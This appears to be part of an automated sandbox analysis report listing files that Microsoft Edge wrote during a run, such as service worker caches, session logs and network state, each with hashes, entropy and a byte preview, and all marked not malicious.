Preview:	0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this\|\|new Function("return this")()}catch(e){if("object"==typeof window

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	188017
Entropy (8bit):	6.38060942154478
Encrypted:	false
SSDEEP:	3072:ApSbXR8HTtwvifSTc8Qa2N8V/cR30cq+pL/hFO0loC4vU:wtwXc8srRkSL/OO4vU
MD5:	B9E7192192B083827587DEE2C69F6024
SHA1:	8A57488A0E384F6883ED17F0A48E41882E088F5A
SHA-256:	CCC360A40FBBC62CF9CDD3FF643FF69AD47B90FEFA5DAA629EA3D8AE523C0E25
SHA-512:	0BB93FC3838BBACDE90AB208C662A8A51D2339CED319997BF511F87EA29E4AFE349C2926EA58E95B1E8002A6DD23E9B337128F83FD05E25F8EDBC05C91F1F7C5
Malicious:	false
Preview:	0\r..m..........rSG.....0....z3.................;.....x..........,T.8..`,.....L`.....,T...`......L`......Rc>.(,....exports...Rc..{....module....Rc.r.n....define....Rb"eu_....amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...\|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H......q.Q.m.J.w.b...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true..a........Db............D`.....A..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da....4U...,T.`.`z.....L`..........a............a.........Dr8................/....-.......}....4..

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	2.1431558784658327
Encrypted:	false
SSDEEP:	3:m+l:m
MD5:	54CB446F628B2EA4A5BCE5769910512E
SHA1:	C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
SHA-256:	FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
SHA-512:	8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
Malicious:	false
Preview:	0\r..m..................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.565412423760729
Encrypted:	false
SSDEEP:	3:GiC0Xl/l/n/lxEwltXSN:GiNwQgN
MD5:	667F448DDB8A64A869E94F44AC635709
SHA1:	90FAF4CC661971D422FE222A0442E349F24F84E8
SHA-256:	B1DFCC3210EA1FB619E7D0B0476F5042934CE91B01C644AC8C736774A528E9BF
SHA-512:	BF8527F83C2AED05E93619547375A3CB3C0F98FD73DE4F317F7AF81887489D46C9224AC78E961C54780928F49C298F950E6C85C6460E5DF4A36912C016C75C69
Malicious:	false
Preview:	@...sA.oy retne.........................X....,................7./../.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.565412423760729
Encrypted:	false
SSDEEP:	3:GiC0Xl/l/n/lxEwltXSN:GiNwQgN
MD5:	667F448DDB8A64A869E94F44AC635709
SHA1:	90FAF4CC661971D422FE222A0442E349F24F84E8
SHA-256:	B1DFCC3210EA1FB619E7D0B0476F5042934CE91B01C644AC8C736774A528E9BF
SHA-512:	BF8527F83C2AED05E93619547375A3CB3C0F98FD73DE4F317F7AF81887489D46C9224AC78E961C54780928F49C298F950E6C85C6460E5DF4A36912C016C75C69
Malicious:	false
Preview:	@...sA.oy retne.........................X....,................7./../.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF2e5b3.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.565412423760729
Encrypted:	false
SSDEEP:	3:GiC0Xl/l/n/lxEwltXSN:GiNwQgN
MD5:	667F448DDB8A64A869E94F44AC635709
SHA1:	90FAF4CC661971D422FE222A0442E349F24F84E8
SHA-256:	B1DFCC3210EA1FB619E7D0B0476F5042934CE91B01C644AC8C736774A528E9BF
SHA-512:	BF8527F83C2AED05E93619547375A3CB3C0F98FD73DE4F317F7AF81887489D46C9224AC78E961C54780928F49C298F950E6C85C6460E5DF4A36912C016C75C69
Malicious:	false
Preview:	@...sA.oy retne.........................X....,................7./../.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	5865
Entropy (8bit):	3.4309787897653665
Encrypted:	false
SSDEEP:	96:S5K2g3Ttl7DxzOWwwZR9Xp+/P+dUjR5SLl9iSr/1I+mqSmWw:Sul7pOq9Xp+3qUN5SLl9iSr/VJ
MD5:	3CDB44911DF9D3FE1097DA6088C674C9
SHA1:	1737E128BF77ED5561FD27FC0212FE11C0A7D826
SHA-256:	CE4B74E8D693C68C6EA794C33AAD4DB590EC9754A14C25393F53BAF7C3A8ED9F
SHA-512:	26D26C5632C9228D1B0C141E071891E2D180C364AC6CFD34F333F74BA935FE64268147F977AA45651753C5AD1E2AF2F1BCA7E10F197CA8E060C365CDF222FD31
Malicious:	false
Preview:	...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f...............b&j.b................next-map-id.1.Cnamespace-cfea5773_6d9c_4d4c_9abe_bba323697e7c-https://ntp.msn.com/.0i#..................map-0-shd_sweeper.{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.e.h.p.s.b.t.q.l.t.,.a.d.s.-.c.b.v.4.2.-.9.0.0.-.t.u.n.e.1.,.a.d.s.-.c.b.v.4.2.-.9.0.0.,.s.i.d.-.n.e.w.-.c.l.i.d.,.s.i.d.-.w.1.-.a.d.d.g.n.o.i.s.e.,.s.i.d.-.w.3.-.a.d.d.g.n.o.i.s.e.,.s.i.d.a.m.o.-.w.1.-.u.n.i.-.s.t.a.g.e.-.1.,.s.i.d.a.m.o.-.w.3.-.u.n.i.-.s.t.a.g.e.-.1.,.p.r.g.-.i.n.f.o.p.-.a.d.s.-.d.l.-.t.1.,.p.n.p.w.e.a.t.o.d.a.y.,.p.r.g.-.1.s.w.-.s.a.p.u.b.b.i.t.m.a.s.k.t.1.,.p.r.g.-.1.s.w.-.s.a.-.u.i.e.r.e.c.a.l.l.e.x.t.3.,.p.r.g.-.1.s.w.-.s.a.-.m.a.i.p.r.o.f.i.l.e._.t.2.,.p.r.g.-.1.s.w.-.s.a.-.s.p.2.-.e.n.-.t.3.,.p.r.g.-.c.g.-.g.a.m.e.-.e.x.p.-.4.,.p.r.g.-.1.s.w.-.a.b.o.r.t.w.v.2.,.1.s.w.-.t.p.s.n.-.d.s.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	330
Entropy (8bit):	5.1564564809813405
Encrypted:	false
SSDEEP:	6:Hv7b+q2PcNwi23oH+TcwtrQMxIFUt8Yv7zdZmw+Yv7yaFNVkwOcNwi23oH+Tcwtf:jCvLZYebCFUt8Qp/+QnF54ZYebtJ
MD5:	EF144E65746DC6AD9D4AB3127C60D2A1
SHA1:	AF1B73390D00F53F8A65C36499EE49BDD5CC2849
SHA-256:	5EAEAC7440F79E142C79C022B568C863CFD3188E5D75FEA4DAA8FD44035F34B3
SHA-512:	6D10FF1719FEB38CC7E02077AA607C249025136FA7D777669D4DF3DA7AB97CCDF3FEC93C4B73896A801985100A2A4E5D95B1342732AAD622E2AC3DC8A5EA2E84
Malicious:	false
Preview:	2024/11/02-14:51:59.025 1e38 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/02-14:51:59.027 1e38 Recovering log #3.2024/11/02-14:51:59.029 1e38 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	330
Entropy (8bit):	5.1564564809813405
Encrypted:	false
SSDEEP:	6:Hv7b+q2PcNwi23oH+TcwtrQMxIFUt8Yv7zdZmw+Yv7yaFNVkwOcNwi23oH+Tcwtf:jCvLZYebCFUt8Qp/+QnF54ZYebtJ
MD5:	EF144E65746DC6AD9D4AB3127C60D2A1
SHA1:	AF1B73390D00F53F8A65C36499EE49BDD5CC2849
SHA-256:	5EAEAC7440F79E142C79C022B568C863CFD3188E5D75FEA4DAA8FD44035F34B3
SHA-512:	6D10FF1719FEB38CC7E02077AA607C249025136FA7D777669D4DF3DA7AB97CCDF3FEC93C4B73896A801985100A2A4E5D95B1342732AAD622E2AC3DC8A5EA2E84
Malicious:	false
Preview:	2024/11/02-14:51:59.025 1e38 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/02-14:51:59.027 1e38 Recovering log #3.2024/11/02-14:51:59.029 1e38 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13375047120913680

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1443
Entropy (8bit):	3.824873204559198
Encrypted:	false
SSDEEP:	24:3CEX7+BcW8psAF4unxKtLp3X2amEtG1Chqf5FlZQQKkOAM4AU:3n7+BctzFcLp2FEkChkrlPHOpG
MD5:	5359113D9905F828BBDF4D1E232AAFE6
SHA1:	B1AE0F5CEA2A742ED2E78591C2A11BBFF430841A
SHA-256:	E721BBF378727E155CDDB4CDCD8922835FD73D50F8296C8508DB5CEAA38D05D5
SHA-512:	6D85DA8D3A30931B7E2CCBC9A8DC136CE1895B01F522206263F64C8E2E19C8001079B648718FFEE890AB81E55A2C90A216F6B1EC2E0A0EE7B8EA0CA89F1A9976
Malicious:	false
Preview:	SNSS..........q..............q......"...q..............q..........q..........q..........q....!.....q..................................q...q1..,......q$...cfea5773_6d9c_4d4c_9abe_bba323697e7c......q..........q.....JR...........q......q..........................q....................5..0......q&...{4B3AC14B-43E5-4896-86E8-9E7D502CE1B5}........q..........q..........................q..............q........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.......y....%..z....%.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8...............................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.44194574462308833
Encrypted:	false
SSDEEP:	12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
MD5:	B35F740AA7FFEA282E525838EABFE0A6
SHA1:	A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
SHA-256:	5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
SHA-512:	05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	358
Entropy (8bit):	5.188850598704211
Encrypted:	false
SSDEEP:	6:HvCwG3+q2PcNwi23oH+Tcwt7Uh2ghZIFUt8YvC6oWZmw+YvC6PVkwOcNwi23oH+Q:tG3+vLZYebIhHh2FUt8tW/+AV54ZYebs
MD5:	0C84580636757258513F2C9A79BB2EF0
SHA1:	6CBF23BCE2CC22F266BBB6032CC1ACA473EFA3F5
SHA-256:	F88564CA50C110DA04B7D855900384BE67CA4880A1294BDF8B2C5337DF1D0A77
SHA-512:	2F89668E5EF9D92C67B646767337FF68F4E6EEAC613F6954127CAB9950C294F588FBB883052130DBFE614BAA75C765FA7312A3757980568A8D795932358093E7
Malicious:	false
Preview:	2024/11/02-14:51:58.434 1d3c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/02-14:51:58.497 1d3c Recovering log #3.2024/11/02-14:51:58.497 1d3c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	358
Entropy (8bit):	5.188850598704211
Encrypted:	false
SSDEEP:	6:HvCwG3+q2PcNwi23oH+Tcwt7Uh2ghZIFUt8YvC6oWZmw+YvC6PVkwOcNwi23oH+Q:tG3+vLZYebIhHh2FUt8tW/+AV54ZYebs
MD5:	0C84580636757258513F2C9A79BB2EF0
SHA1:	6CBF23BCE2CC22F266BBB6032CC1ACA473EFA3F5
SHA-256:	F88564CA50C110DA04B7D855900384BE67CA4880A1294BDF8B2C5337DF1D0A77
SHA-512:	2F89668E5EF9D92C67B646767337FF68F4E6EEAC613F6954127CAB9950C294F588FBB883052130DBFE614BAA75C765FA7312A3757980568A8D795932358093E7
Malicious:	false
Preview:	2024/11/02-14:51:58.434 1d3c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/02-14:51:58.497 1d3c Recovering log #3.2024/11/02-14:51:58.497 1d3c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0018164538716206493
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zEZl9Tq:/M/xT02z
MD5:	EFBB59622CD8908E4F3C95558C7000B7
SHA1:	97AC6B31CD6EABE9CE4E5844178DE46E44EFC3D0
SHA-256:	F0AE0CD1CF0AF6A043EE5FA1927443927716402D513B5A492E15ED469A1EA168
SHA-512:	3FE2AB8C0E2B3367BFFA9B38DD952475C3FC5D3610B3EB2B896780562ACF5D72EB764764CF726C4146FBBF3A10E728975DAA255F296B624B6823E7F145070C19
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	440
Entropy (8bit):	5.25746742635456
Encrypted:	false
SSDEEP:	12:KbfvLZYebvqBQFUt8X0DZ/+X354ZYebvqBvJ:KbnlYebvZg8X0DYpoYebvk
MD5:	B9382C937281F5FD2E6D1BC149D78D7B
SHA1:	C2C8F460E577FD228C6972CA37E6715B28F622A8
SHA-256:	D314CBD314057D5812316BBEFCDD9B7F51AC86A35EE9D7C0065CDF7CA1DEA4FB
SHA-512:	35DB0D53729C91FBC1A4AA608CDA89621BD4349FAE28EE99602425A3970BE7B62D475F9143A4992F64CCD92A52A7612C4ABF859640D5DDCDA0DA9484C9EC6043
Malicious:	false
Preview:	2024/11/02-14:51:59.162 1e38 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/02-14:51:59.164 1e38 Recovering log #3.2024/11/02-14:51:59.167 1e38 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	440
Entropy (8bit):	5.25746742635456
Encrypted:	false
SSDEEP:	12:KbfvLZYebvqBQFUt8X0DZ/+X354ZYebvqBvJ:KbnlYebvZg8X0DYpoYebvk
MD5:	B9382C937281F5FD2E6D1BC149D78D7B
SHA1:	C2C8F460E577FD228C6972CA37E6715B28F622A8
SHA-256:	D314CBD314057D5812316BBEFCDD9B7F51AC86A35EE9D7C0065CDF7CA1DEA4FB
SHA-512:	35DB0D53729C91FBC1A4AA608CDA89621BD4349FAE28EE99602425A3970BE7B62D475F9143A4992F64CCD92A52A7612C4ABF859640D5DDCDA0DA9484C9EC6043
Malicious:	false
Preview:	2024/11/02-14:51:59.162 1e38 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/02-14:51:59.164 1e38 Recovering log #3.2024/11/02-14:51:59.167 1e38 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\27b37f77-c59c-4cfc-94df-1d10f7b32db1.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	111
Entropy (8bit):	4.718418993774295
Encrypted:	false
SSDEEP:	3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
MD5:	285252A2F6327D41EAB203DC2F402C67
SHA1:	ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
SHA-256:	5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
SHA-512:	11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\33c4e843-977d-4d01-bbb4-a5e8708cce06.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	111
Entropy (8bit):	4.718418993774295
Encrypted:	false
SSDEEP:	3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
MD5:	285252A2F6327D41EAB203DC2F402C67
SHA1:	ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
SHA-256:	5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
SHA-512:	11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF283bc.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF28543.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	0.3886039372934488
Encrypted:	false
SSDEEP:	24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
MD5:	DEA619BA33775B1BAEEC7B32110CB3BD
